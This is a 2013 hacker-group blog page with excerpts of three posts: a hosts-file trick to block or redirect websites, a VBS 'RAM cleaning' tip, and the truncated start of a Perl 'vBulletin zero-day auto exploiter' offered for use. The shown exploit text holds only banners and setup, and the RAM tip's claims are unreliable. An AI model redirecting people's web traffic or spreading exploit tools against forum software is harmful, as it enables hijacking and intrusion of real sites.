1ND14N H4X0R5 T34M (IHT) JAI HIND JAI BHARAT

We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

Saturday, 21 September 2013

How to block and replace a website on a PC.

How to block and replace a website on a PC. My computer=> C drive => Windows=>System32=>drivers=>etc=> host file Open host file in WordPad or notepad Now open CMD and type in CMD ping www.google.com then copy the IP Address of Google website In host file just write the IPaddress of Google website that you copy and name of the website which one you want to block. Like: 87.248.112.181 www.facebook.com in this case you will type in URL www.facebook.com but Google website will open. for block: type 127.0.0.1 www.facebook.com...

Monday, 16 September 2013

Cleaning RAM without any Software

Cleaning RAM without any Software Cleaning RAM is very easy task here are steps for it, just follow them: 1). Open notepad. 2). Type FreeMem=Space(64000000). 3). Save file with name "CleanRAM.vbs". 4). Close it and run the file. It will free memory in RAM, if you want to free more memory than you can write following command in notepad instead of what given in step 2. FreeMem= (256000000) for 256 mb FreeMem= (128000000) for 128 mb FreeMem= (72000000) for 72 mb FreeMem= (64000000) for 64 mb FreeMem= (32000000) for 32 mb FreeMem= (24000000)...

Sunday, 15 September 2013

vBulletin Zero-Day Exploit in perl leaked

Perl#!/usr/bin/perluse LWP::UserAgent;use HTTP::Request::Common;system('cls');system('title vBulletin Install Auto Exploiter');print "\n ---------------------------------------";print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";print " ---------------------------------------\n";print " + d4tabase.com -+- d4tabase.com + ";print "\n ---------------------------------------\n";print " coded by n0tch shoutz d4tabase crew ";print "\n ---------------------------------------\n";if($#ARGV == -1 or $#ARGV > 0){print...